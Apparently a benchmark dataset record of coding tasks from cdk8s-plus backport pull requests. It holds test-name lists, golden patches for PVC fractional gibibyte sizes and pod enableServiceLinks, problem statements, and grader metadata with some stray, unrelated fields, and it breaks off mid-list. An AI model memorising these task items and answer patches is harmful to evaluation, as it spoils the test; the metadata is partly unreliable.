a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Size.toGibibytes(options?: { rounding: SizeRoundingBehavior }) Location: `cdk8s.Size` class (imported from the `cdk8s` library). Inputs: Optional `options` object; currently supports a single key `rounding` whose value must be one of the `SizeRoundingBehavior` enum members (e.g., `SizeRoundingBehavior.NONE`). If omitted, the method falls back to the default rounding behavior. Outputs: Returns a `number` representing the size expressed in gibibytes (Gi). When `rounding: SizeRoundingBehavior.NONE` is supplied, the method returns a fractional value rather than rounding to the nearest whole Gi. Description: Converts a `Size` instance to its value in gibibytes. The new `options` argument allows callers to control rounding; using `NONE` permits fractional Gi values such as “0.5Gi”. Method: PersistentVolumeClaim.storage (getter) Location: `kplus.PersistentVolumeClaim` class (`src/pvc.ts`). Inputs: None (property accessor). Outputs: Returns a `Size | undefined` — the storage size that was supplied in the PVC props, or `undefined` if not set. Description: Exposes the requested storage size of a PersistentVolumeClaim as a `Size` object, enabling callers (including tests) to compare or reuse the value without re‑parsing the rendered manifest.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/5681", "https://github.com/sorenlouv/backport" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue backports a fix that allows fractional GiB storage sizes for PVCs. The added test validates that a PVC created with 512 Mi results in a \"0.5Gi\" quantity in the manifest, and the golden patch modifies the conversion to use NONE rounding to preserve fractions. The test directly reflects the described fix and introduces no unrelated assertions, so it aligns with the requirements. No B‑category signals are present, making this a clear, solvable task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
c9ce02a18e16c1a98f43abc6a51b9ec9710949d7
2025-05-07 15:40:57
cdk8s-team__cdk8s-plus-5708
diff --git a/src/pvc.ts b/src/pvc.ts index 25c133ae..5c23eec2 100644 --- a/src/pvc.ts +++ b/src/pvc.ts @@ -1,4 +1,4 @@ -import { Size, ApiObject, Lazy } from 'cdk8s'; +import { Size, SizeRoundingBehavior, ApiObject, Lazy } from 'cdk8s'; import { Construct } from 'constructs'; import * as base from './base'; import * as k8s from './imports/k8s'; @@ -197,7 +197,9 @@ export class PersistentVolumeClaim extends base.Resource implements IPersistentV * @internal */ public _toKube(): k8s.PersistentVolumeClaimSpec { - const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes() + 'Gi') : undefined; + const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes({ + rounding: SizeRoundingBehavior.NONE, + }) + 'Gi') : undefined; return { volumeName: this.volume ? this.volume.name : undefined, accessModes: this.accessModes?.map(a => a.toString()),
fix(pvc): fractional gibibytes storage sizes are not allowed (backport #5681) # Backport This will backport the following commits from `k8s-32/main` to `k8s-31/main`: - [fix(pvc): fractional gibibytes storage sizes are not allowed (#5681)](https://github.com/cdk8s-team/cdk8s-plus/pull/5681) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Prevent unintended rounding of PVC storage sizes expressed in gibibytes **Problem** When a PersistentVolumeClaim specifies a size, the library automatically rounded the value to the nearest whole gibibyte. Kubernetes rejects PVC specifications that contain fractional gibibyte values, leading to silent creation of invalid manifests. **Root Cause** The size‑to‑Gi conversion used the default rounding behavior, which coerces fractional amounts into whole numbers without warning. **Fix / Expected Behavior** - Convert PVC storage sizes to gibibytes with explicit “no rounding” semantics. - Preserve the exact numeric value supplied by the user when forming the Kubernetes Quantity string. - Ensure that any fractional gibibyte size is either represented accurately or rejected by validation, rather than being silently altered. - Maintain existing functionality for whole‑number sizes. **Risk & Validation** - Verify that PVC manifests with integer gibibyte sizes remain unchanged. - Add tests confirming that fractional sizes are handled per the new rounding policy and do not produce invalid manifests. - Run the full suite to ensure no regressions in other storage‑related constructs.
5,708
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/pvc.test.ts.snap b/test/__snapshots__/pvc.test.ts.snap index 90a908d2..fe7599ca 100644 --- a/test/__snapshots__/pvc.test.ts.snap +++ b/test/__snapshots__/pvc.test.ts.snap @@ -100,3 +100,23 @@ Array [ }, ] `; + +exports[`small size 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "PersistentVolumeClaim", + "metadata": Object { + "name": "test-persistentvolumeclaim-c8af0974", + }, + "spec": Object { + "resources": Object { + "requests": Object { + "storage": "0.5Gi", + }, + }, + "volumeMode": "Filesystem", + }, + }, +] +`; diff --git a/test/pvc.test.ts b/test/pvc.test.ts index 3b1c1bec..e0619c7f 100644 --- a/test/pvc.test.ts +++ b/test/pvc.test.ts @@ -49,6 +49,19 @@ test('custom', () => { }); +test('small size', () => { + + const chart = cdk8s.Testing.chart(); + const pvc = new kplus.PersistentVolumeClaim(chart, 'PersistentVolumeClaim', { + storage: cdk8s.Size.mebibytes(512), + }); + + expect(pvc.storage).toEqual(cdk8s.Size.mebibytes(512)); + + const resources = cdk8s.Testing.synth(chart); + expect(resources).toMatchSnapshot(); +}); + test('can be imported', () => { const chart = Testing.chart();
[ "small size" ]
[ "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "fromCommand", "fromHttpGet", "fromTcpSocket", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "can grant permissions on imported", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can mutate metadata", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "default configuration", "custom configuration", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "can select namespaces", "can select all namespaces", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
No new interfaces are introduced.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/5681" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue wants PVC to accept fractional Gi values; the added test creates a PVC with 512 Mi and expects the manifest to contain \"0.5Gi\". The provided golden patch changes the conversion to use SizeRoundingBehavior.NONE, which satisfies the test. Tests align with the inferred requirement and there are no unrelated test couplings or missing external info, so the task is solvable (A).", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
03a72863b245715c86bea135801b5aad576c4acc
2025-05-08 08:13:44
cdk8s-team__cdk8s-plus-5711
diff --git a/src/pod.ts b/src/pod.ts index 14e4dfd2..d8d93ec2 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -22,6 +22,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, public readonly shareProcessNamespace: boolean; public readonly hostNetwork?: boolean; public readonly terminationGracePeriod?: Duration; + public readonly enableServiceLinks?: boolean; protected readonly isolate: boolean; @@ -45,6 +46,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, this.isolate = props.isolate ?? false; this.hostNetwork = props.hostNetwork ?? false; this.terminationGracePeriod = props.terminationGracePeriod ?? Duration.seconds(30); + this.enableServiceLinks = props.enableServiceLinks; if (props.containers) { props.containers.forEach(c => this.addContainer(c)); @@ -254,6 +256,7 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, shareProcessNamespace: this.shareProcessNamespace, hostNetwork: this.hostNetwork, terminationGracePeriodSeconds: this.terminationGracePeriod?.toSeconds(), + enableServiceLinks: this.enableServiceLinks, }; } @@ -469,6 +472,15 @@ export interface AbstractPodProps extends base.ResourceProps { * @default Duration.seconds(30) */ readonly terminationGracePeriod?: Duration; + + /** + * Indicates whether information about services should be injected into pod's + * environment variables, matching the syntax of Docker links. + * + * @default true + * @see https://kubernetes.io/docs/concepts/services-networking/connect-applications-service/#accessing-the-service + */ + readonly enableServiceLinks?: boolean; } /**
feat(pod): support `enableServiceLinks` (backport #5471) # Backport This will backport the following commits from `k8s-32/main` to `k8s-30/main`: - [feat(pod): support &#x60;enableServiceLinks&#x60; (#5471)](https://github.com/cdk8s-team/cdk8s-plus/pull/5471) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Add support for the `enableServiceLinks` flag on Pods **Problem** The construct library does not expose the Kubernetes `enableServiceLinks` setting, preventing users from disabling automatic injection of service‑related environment variables into a pod. **Root Cause** The pod abstraction omits the `enableServiceLinks` property, so the field is never rendered in the pod spec. **Fix / Expected Behavior** - Provide an optional `enableServiceLinks` property on pod constructs. - Forward this value into the generated pod spec. - Default the property to `true` to retain Kubernetes’ default behavior. - Document the purpose and default of the new option. - Preserve backward compatibility for callers that do not set the flag. **Risk & Validation** - Confirm that manifests include `enableServiceLinks` only when appropriate and that the default remains unchanged. - Run the full test suite to ensure existing functionality is unaffected. - Manually validate a pod with `enableServiceLinks: false` to verify service env vars are not injected.
5,711
cdk8s-team/cdk8s-plus
diff --git a/test/pod.test.ts b/test/pod.test.ts index 17f44567..99ea4830 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -1605,3 +1605,14 @@ test('Containers should not specify "restartPolicy" field', () => { expect(() => Testing.synth(chart)).toThrowError(); }); +test('enableServiceLinks can be disabled', () => { + const chart = Testing.chart(); + new kplus.Pod(chart, 'Pod', { + containers: [{ image: 'image' }], + enableServiceLinks: false, + }); + + const spec = Testing.synth(chart)[0].spec; + expect(spec.enableServiceLinks).toBeFalsy(); +}); +
[ "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "enableServiceLinks can be disabled", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
[ "Can mutate metadata", "defaultChild", "default configuration", "custom configuration", "Can be isolated", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "fromCommand", "fromHttpGet", "fromTcpSocket", "can grant permissions on imported", "defaults", "custom", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can select namespaces", "can select all namespaces", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "small size", "can be bounded to a volume at 